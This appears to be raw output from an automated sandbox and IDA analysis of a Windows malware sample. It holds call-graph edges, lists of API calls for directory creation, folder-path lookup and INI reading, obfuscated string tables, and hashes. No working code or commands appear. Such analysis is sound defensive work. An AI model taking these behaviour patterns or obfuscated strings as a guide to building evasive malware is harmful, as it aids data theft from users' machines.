77696->77694 77696->77695 77697 cf0e0 RtlAllocateHeap RtlAllocateHeap RtlFreeHeap 77696->77697 77707 4d40bd4 BaseDllReadWriteIniFile 77696->77707 77708 4d40be4 BaseDllReadWriteIniFile 77696->77708 77709 4d40ba5 BaseDllReadWriteIniFile 77696->77709 77710 4d40b67 BaseDllReadWriteIniFile 77696->77710 77711 4d40ae2 BaseDllReadWriteIniFile 77696->77711 77712 4d40bf2 BaseDllReadWriteIniFile 77696->77712 77713 4d40b13 BaseDllReadWriteIniFile 77696->77713 77714 4d40b2e BaseDllReadWriteIniFile 77696->77714 77715 4d40b78 BaseDllReadWriteIniFile 77696->77715 77716 4d40bfa BaseDllReadWriteIniFile 77696->77716 77717 4d40b4b BaseDllReadWriteIniFile 77696->77717 77861 cdee0 RtlAllocateHeap RtlAllocateHeap RtlFreeHeap 77696->77861 77862 ce0f0 RtlAllocateHeap RtlAllocateHeap RtlFreeHeap 77696->77862 77697->77696 77698->77696 77699->77696 77700->77696 77701->77696 77702->77696 77703->77696 77704->77696 77705->77696 77706->77696 77707->77696 77708->77696 77709->77696 77710->77696 77711->77696 77712->77696 77713->77696 77714->77696 77715->77696 77716->77696 77717->77696 77719 4d90e98 GetPrivateProfileStringA 77718->77719 77721 4d90f82 77719->77721 77721->77385 77723 4d90e94 GetPrivateProfileStringA 77722->77723 77725 4d90f82 77723->77725 77725->77385 77727 4d90f4d GetPrivateProfileStringA 77726->77727 77728 4d90f75 77726->77728 77727->77728 77728->77385 77731 4d90e94 GetPrivateProfileStringA 77730->77731 77733 4d90f82 77731->77733 77733->77385 77735 4d90efe GetPrivateProfileStringA 77734->77735 77737 4d90f82 77735->77737 77737->77385 77739 4d90e22 77738->77739 77740 4d90e86 GetPrivateProfileStringA 77738->77740 77739->77385 77742 4d90f82 77740->77742 77742->77385 77744 4d90ea8 GetPrivateProfileStringA 77743->77744 77746 4d90f82 77744->77746 77746->77385 77748 4d90e60 77747->77748 77750 4d90eac GetPrivateProfileStringA 77747->77750 77749 4d90e85 GetPrivateProfileStringA 77748->77749 77751 4d90e7a 77749->77751 77753 4d90f82 77750->77753 77753->77385 77755 4d90f5a 
GetPrivateProfileStringA 77754->77755 77756 4d90f82 77755->77756 77756->77385 77758 11a6e5 77757->77758 77759 11a69d 77757->77759 77824 11a6fb 4 API calls 3 library calls 77758->77824 77760 11a6a3 77759->77760 77764 11a6c0 77759->77764 77820 11addf RtlAllocateHeap RtlFreeHeap __dosmaperr 77760->77820 77762 11a6b3 77762->77385 77770 11a6de 77764->77770 77822 11addf RtlAllocateHeap RtlFreeHeap __dosmaperr 77764->77822 77765 11a6a8 77821 112340 ExitProcess RtlAllocateHeap RtlFreeHeap __fread_nolock 77765->77821 77768 11a6cf 77823 112340 ExitProcess RtlAllocateHeap RtlFreeHeap __fread_nolock 77768->77823 77770->77385 77772 4d40af3 BaseDllReadWriteIniFile 77771->77772 77774 4d40c2a 77772->77774 77776 4d40b41 BaseDllReadWriteIniFile 77775->77776 77778 4d40c2a 77776->77778 77780 4d40b7e BaseDllReadWriteIniFile 77779->77780 77782 4d40c2a 77780->77782 77784 4d40bba BaseDllReadWriteIniFile 77783->77784 77786 4d40c2a 77784->77786 77788 4d40bfe BaseDllReadWriteIniFile 77787->77788 77790 4d40c2a 77788->77790 77792 4d40b5e BaseDllReadWriteIniFile 77791->77792 77794 4d40c2a 77792->77794 77796 4d40b1a BaseDllReadWriteIniFile 77795->77796 77798 4d40c2a 77796->77798 77800 4d40c0f BaseDllReadWriteIniFile 77799->77800 77801 4d40c2a 77800->77801 77803 4d40af3 BaseDllReadWriteIniFile 77802->77803 77805 4d40c2a 77803->77805 77807 4d40c03 BaseDllReadWriteIniFile 77806->77807 77809 4d40c2a 77807->77809 77811 4d40bba BaseDllReadWriteIniFile 77810->77811 77813 4d40c2a 77811->77813 77815 f27b0 3 API calls 77814->77815 77816 f2903 77815->77816 77816->77385 77817->77385 77818->77385 77819->77349 77820->77765 77821->77762 77822->77768 77823->77762 77824->77762 77831 97a10 77825->77831 77826 97ac9 77855 37d60 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77826->77855 77827 97a4e 77829 10ce31 std::_Facet_Register 4 API calls 77827->77829 77832 97a68 77829->77832 77830 97ace 77831->77826 77831->77827 77834 97a94 77831->77834 77833 95e10 4 API calls 77832->77833 77835 97a82 77833->77835 
77834->77464 77836 97810 4 API calls 77835->77836 77836->77834 77838 93568 77837->77838 77839 93535 77837->77839 77841 935a8 77838->77841 77842 9358a 77838->77842 77840 10ce31 std::_Facet_Register 4 API calls 77839->77840 77843 9353f 77840->77843 77847 32700 4 API calls 77841->77847 77844 979e0 4 API calls 77842->77844 77845 10ce31 std::_Facet_Register 4 API calls 77843->77845 77846 93595 77844->77846 77845->77838 77846->77464 77848 935b8 77847->77848 77849 99c70 4 API calls 77848->77849 77850 935cd 77849->77850 77851 38920 4 API calls 77850->77851 77852 935e2 Concurrency::cancel_current_task 77851->77852 77852->77464 77853->77464 77854->77464 77855->77830 77856->77548 77857->77548 77859->77621 77860->77621 77861->77696 77862->77696 77863 12002b 77866 11fd77 77863->77866 77865 12005c 77867 11fd83 __fread_nolock std::_Lockit::_Lockit 77866->77867 77870 11fdd2 77867->77870 77869 11fd9e 77869->77865 77871 11fded 77870->77871 77872 11fe60 std::_Lockit::_Lockit 77870->77872 77871->77872 77873 11fe40 77871->77873 77880 12becc 77871->77880 77872->77869 77873->77872 77875 12becc 4 API calls 77873->77875 77876 11fe56 77875->77876 77878 124953 __freea 2 API calls 77876->77878 77877 11fe36 77879 124953 __freea 2 API calls 77877->77879 77878->77872 77879->77873 77881 12bef4 77880->77881 77882 12bed9 77880->77882 77884 12bf03 77881->77884 77899 1319b8 ExitProcess RtlAllocateHeap RtlFreeHeap __fread_nolock __dosmaperr 77881->77899 77882->77881 77883 12bee5 77882->77883 77898 11addf RtlAllocateHeap RtlFreeHeap __dosmaperr 77883->77898 77889 125331 77884->77889 77887 12beea __fread_nolock 77887->77877 77890 125349 77889->77890 77891 12533e 77889->77891 77893 125351 77890->77893 77897 12535a __dosmaperr std::_Facet_Register 77890->77897 77892 1249cd std::_Locinfo::_Locinfo_ctor 3 API calls 77891->77892 77896 125346 77892->77896 77894 124953 __freea 2 API calls 77893->77894 77894->77896 77896->77887 77897->77896 77900 11addf RtlAllocateHeap RtlFreeHeap __dosmaperr 77897->77900 
77898->77887 77899->77884 77900->77896 77901 9c4d0 77902 9c4fd 77901->77902 77903 9c4d7 77901->77903 77903->77902 77904 112350 3 API calls 77903->77904 77905 98000 77904->77905 77906 9b180 4 API calls 77905->77906 77908 9804c 77905->77908 77907 98013 77906->77907 77907->77908 77909 112350 3 API calls 77907->77909 77910 98074 77909->77910 77921 33b70 4 API calls 2 library calls 77910->77921 77912 98121 77913 10ce31 std::_Facet_Register 4 API calls 77912->77913 77914 98128 77913->77914 77915 10bc3e std::locale::_Init 4 API calls 77914->77915 77916 9813b 77915->77916 77922 995e0 5 API calls 4 library calls 77916->77922 77918 9816e 77919 981b2 77918->77919 77923 33b70 4 API calls 2 library calls 77918->77923 77921->77912 77922->77918 77923->77919
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 000722E0
                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0007233C
                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 00072CE3
                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 00072EBA
                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 00073074
                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 00073257
                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0007353E
                                                                                                                                                                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0007236D
                                                                                                                                                                                      • Part of subcall function 0003BF90: GetFileAttributesA.KERNEL32 ref: 0003BFBE
                                                                                                                                                                                      • Part of subcall function 0003BF90: __Mtx_unlock.LIBCPMT ref: 0003BFEE
                                                                                                                                                                                      • Part of subcall function 00095E10: Concurrency::cancel_current_task.LIBCPMT ref: 00095EF7
                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0007248E
                                                                                                                                                                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 000724BD
                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0007266D
                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 000726CB
                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0007287A
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateDirectory$FolderPath$AttributesConcurrency::cancel_current_taskFileMtx_unlock
                                                                                                                                                                                    • String ID: AGC$\FR$$v3)$(='>$.)%9$8b96$?#?/$CWK[$DGGL$DYCZ$DYCZ$DYCZ$DYCZ$DYCZ$EC^\$EC^\$EMA$EMA$FICZ$FU_F$J@}$J@}$J@}$JBB$JNL]$JNL]$JNL]$J^nB$K% /$Ln#+$NO_O$NvDB$NvDB$OU\R$QORP$R\\T$T[OD$T\LK$XICI$Y\AK$[_CS$[_CS$[_CS$\XB^$]UQ[$^BNF$_CFK$_DH\$e.$ $fxyn$fxyn$fxyn$fxyn$fxyn$fxyn$fxyn$fxyn$fxyn$fxyn$fxyn$fxyn$fxyn$f|t$gm}~$jxl$jxl$jxl$jxl$jxl$jxl$jxl$jxl$jxl$jxl$jxl$jxl$jxl$kHKU$kKM_$kgjk$kqes$l\XW$r{lx$tJY^${IJI${IJI${IJI${IJI${IJI${KFD${KFD${KFD${KFD${KFD${LH^${LH^${LH^${MPu${[H\${[XF${[XF${[XF${\FR${_JR${aj{${aj{${dFI${dFI${dFI${d\D${e@D${eLY${jH^${jH^${mEO${n@F${n@F${nLK${oHG${o[E${x@N${{@M${{@M${{BS${{]O${|FR${|eK${~bh${~yd
                                                                                                                                                                                    • API String ID: 4270311917-2286779694
                                                                                                                                                                                    • Opcode ID: c2670601e3cf63952853a3f741c45ad92b08346faf5a9313bf63bf0dd7c6cfd7
                                                                                                                                                                                    • Instruction ID: eca16364ca51ccf57d974069b58b9bbd136843ada28ec9d380a8c5ff14342915
                                                                                                                                                                                    • Opcode Fuzzy Hash: c2670601e3cf63952853a3f741c45ad92b08346faf5a9313bf63bf0dd7c6cfd7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8E438070D042589ADF26EB64CC56BEDB778AF21304F4441D8E44977283EB746B88CFA6
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 000722E0
                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0007233C
                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 00072CE3
                                                                                                                                                                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0007236D
                                                                                                                                                                                      • Part of subcall function 0003BF90: GetFileAttributesA.KERNEL32 ref: 0003BFBE
                                                                                                                                                                                      • Part of subcall function 0003BF90: __Mtx_unlock.LIBCPMT ref: 0003BFEE
                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0007248E
                                                                                                                                                                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 000724BD
                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0007266D
                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 000726CB
                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0007287A
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateDirectory$FolderPath$AttributesFileMtx_unlock
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(?,?), ref: 00040784
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 000407B2
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 000409DD
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 000409EC
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 00040D86
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 00040D96
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 00040F76
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 00040F85
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 000410C6
                                                                                                                                                                                      • Part of subcall function 0003BF90: GetFileAttributesA.KERNEL32 ref: 0003BFBE
                                                                                                                                                                                      • Part of subcall function 0003BF90: __Mtx_unlock.LIBCPMT ref: 0003BFEE
                                                                                                                                                                                      • Part of subcall function 00095E10: Concurrency::cancel_current_task.LIBCPMT ref: 00095EF7
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 000410D5
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 0004126B
                                                                                                                                                                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00041415
                                                                                                                                                                                    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0004143C
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Mtx_unlock$AttributesFileFolderPath$Concurrency::cancel_current_task
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00041415
                                                                                                                                                                                    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0004143C
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FolderPath
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 0008643E
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 0008644D
                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0008744F
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 000876BC
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 000876CB
                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(?), ref: 0008842E
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Mtx_unlock$AttributesCreateDirectoryFile
                                                                                                                                                                                    • String ID: \Q^$\Q^$\Q^$@EH]$@EH]$@EH]$@^uS$@^uS$@^uS$@^uS$BPYC$BPYC$BPYC$BPYC$CGDK$CGDK$CGDK$CGDK$DJDB$IIDO$IIDO$IIDO$IIDO$IIDO$IIDO$O\]Z$O\]Z$QIE_$QIE_$QIE_$QIE_$QIE_$SGBO$SGBO$TMJ_$TMJ_$TM[\$TM[\$WI]B$WI]B$WI]B$WI]B$YMYG$YMYG$YMYG$YMYG$\_H\$\_H\$\_H\$aiey$aiey$aiey$aiey$dBAW$dBAW$sz|o$sz|o$sz|o$sz|o$type must be boolean, but is ${i\^${j[E${j[E${j[E${kFE${kFE${kFE
                                                                                                                                                                                    • API String ID: 3883471643-1209422803
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Mtx_unlock$AttributesCreateDirectoryFile
                                                                                                                                                                                    • String ID: \Q^$\Q^$BPYu$BPYu$BPYu$BPYu$DI[N$DI[N$EM@K$EM@K$FCCZ$FCCZ$G@X#$IAJA$IAJA$IIDO$IIDO$KIZ^$KIZ^$LQCV$LQCV$RIL\$RIL\$SADO$SADO$\_H\$\_H\$_C_W$tBXC$tBXC$tCCq$tCCq$tJB[$tJB[${`@Y${`@Y${j[E${j[E${kj
                                                                                                                                                                                    • API String ID: 3883471643-261706488
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 00065986
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 0006599B
                                                                                                                                                                                      • Part of subcall function 0003BF90: GetFileAttributesA.KERNEL32 ref: 0003BFBE
                                                                                                                                                                                      • Part of subcall function 0003BF90: __Mtx_unlock.LIBCPMT ref: 0003BFEE
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Mtx_unlock$AttributesFile
                                                                                                                                                                                    • String ID: AG[G$AG[G$AG[G$BB^$DM[^$DM[^$EC^\$EM@K$EXXC$FDd`$FDd`$FDd`$KGNC$KGNC$KGNC$KGNC$KGNC$MEAK$OGZ^$WIZY$WIZY$WZFL$WZFL$\C_J$\C_J$cannot use operator[] with a string argument with $psT@$wI]B$wZFL$xYOC$xYOC$xYOC${CLS${CLS${CLS${CLS${CLS${CLS${DFM${KLX${KLX${KLX${KLX${KLX${KLX${X[E${y\K
                                                                                                                                                                                    • API String ID: 1886074773-3293382187
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Mtx_unlock$AttributesCreateDirectoryFile
                                                                                                                                                                                    • String ID: \Q^$\Q^$DJDB$DJDB$E@BO$E@BO$G@X#$IIDO$QIE_$QIE_$SADO$SADO$WI]B$WI]B$\_H\$\_H\$_C_W${`@Y${j[E${j[E${lF]${lF]
                                                                                                                                                                                    • API String ID: 3883471643-2028872817
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Initstd::locale::_
                                                                                                                                                                                    • String ID: @^uS$BFJX$BFJX$BFJX$BI^$BI^$BPYC$CGDK$DGFA$DGFA$D^Fr$H[vI$H[vI$H[vI$IIDO$KoZW$KoZW$O\]Z$QIE_$QIE_$R\YK$R\YK$R\YK$TMJ_$WI]B$YMYG$YU]Z$YU]Z$YU]Z$cannot use operator[] with a string argument with $dBAW$iM]]
                                                                                                                                                                                    • API String ID: 1620887387-85083418
                                                                                                                                                                                    • Opcode ID: 52c25f8b3ef434d9afa08a568fffe7402b023cee35559c69280f1972b83d6dd6
                                                                                                                                                                                    • Instruction ID: 14c0954a80a1d58e89a5d5cd57651684d983c6100c15e0192f4cde49512032d5
                                                                                                                                                                                    • Opcode Fuzzy Hash: 52c25f8b3ef434d9afa08a568fffe7402b023cee35559c69280f1972b83d6dd6
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F23CD70D04258CBDF25DB64C855BEEBBB4AF15304F1442E8E84967282EB746F89CF92
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Initstd::locale::_
                                                                                                                                                                                    • String ID: BFJX$BFJX$BFJX$BFJX$BPYu$BPYu$DI[N$DI[N$DI[N$EM@K$EM@K$FCCZ$HZ@M$H[vI$H[vI$H[vI$H[vI$H[vI$H[vI$IAJA$IAJA$IIDO$IIDO$KIZ^$KoZW$KoZW$KoZW$KoZW$LQCV$LQCV$RIL\$R\YK$R\YK$R\YK$R\YK$YU]Z$YU]Z$YU]Z$YU]Z$YU]Z$YU]Z$tBXC$tCCq$tCCq$tJB[
                                                                                                                                                                                    • API String ID: 1620887387-853291600
                                                                                                                                                                                    • Opcode ID: 1ad566286abe5c4f27e9d3cc76cfb9eb324da45505fbd7239d9de4215f217efe
                                                                                                                                                                                    • Instruction ID: e7ea8f1ae24923db90401985dcaeb0d2b1f22e16ca752cdc272ca0a3de2f5e7d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ad566286abe5c4f27e9d3cc76cfb9eb324da45505fbd7239d9de4215f217efe
                                                                                                                                                                                    • Instruction Fuzzy Hash: D343CE70D042588BDB25DF24CC55BEEBBB4AF15304F1441E8E849A7282EB75AF89CF91
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00072250: CreateDirectoryA.KERNEL32(00000000,00000000), ref: 000722E0
                                                                                                                                                                                      • Part of subcall function 00072250: CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0007233C
                                                                                                                                                                                      • Part of subcall function 00072250: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0007236D
                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000,?,5F45787B,00163AFC,00000000,5F45787B,5F45787C), ref: 0008D282
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 0008D496
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 0008D4A5
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 0008D6B6
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 0008D6C5
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 0008D8C6
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 0008D8D5
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 0008DBC6
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 0008DBD5
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 0008E0CE
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 0008E0DD
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 0008E2D6
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 0008E2E5
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 0008E4E7
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 0008E4F6
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 0008E7E6
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 0008E7F5
                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000,?,46487F7B,00163AFC,00000000,46487F7B,46487F7C), ref: 0008DEBC
                                                                                                                                                                                      • Part of subcall function 0009D850: Concurrency::cancel_current_task.LIBCPMT ref: 0009D92D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Mtx_unlock$CreateDirectory$Concurrency::cancel_current_taskFolderPath
                                                                                                                                                                                    • String ID: GIY]$SIIj$kGJK$nFMO$tQGI${n@F${xE_
                                                                                                                                                                                    • API String ID: 791088107-847423877
                                                                                                                                                                                    • Opcode ID: 824f6cac376d0ae5e109156efad1b3fed2b005c1d2b8e795eebfc6abbd47e466
                                                                                                                                                                                    • Instruction ID: 4ecb0f251edc5ebdcb9adeabaaa07a926eba361a42825f667661b6e5287caa7e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 824f6cac376d0ae5e109156efad1b3fed2b005c1d2b8e795eebfc6abbd47e466
                                                                                                                                                                                    • Instruction Fuzzy Hash: 85030931D00258CFDF18EB68CC94BEDBB75BF16304F14829CE489A7292DB759A85CB61
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Mtx_unlock$AttributesFile
                                                                                                                                                                                    • String ID: J@}$NTHJ$[_CS${aGN${dFI
                                                                                                                                                                                    • API String ID: 1886074773-2598508030
                                                                                                                                                                                    • Opcode ID: 7fa171adc0bd1a65327569c34b1a743b4bf290e2fae6732c8ae7e1e1dd54e19a
                                                                                                                                                                                    • Instruction ID: 990460d7fffb714b5b34e1a57605ff39c922690dcfcaf112a01aea3ae2447ebd
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7fa171adc0bd1a65327569c34b1a743b4bf290e2fae6732c8ae7e1e1dd54e19a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0BD25970D002099BDF09DBB8CC957FEBBB9AF16304F24826CE445B7192D7749A85CBA1
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
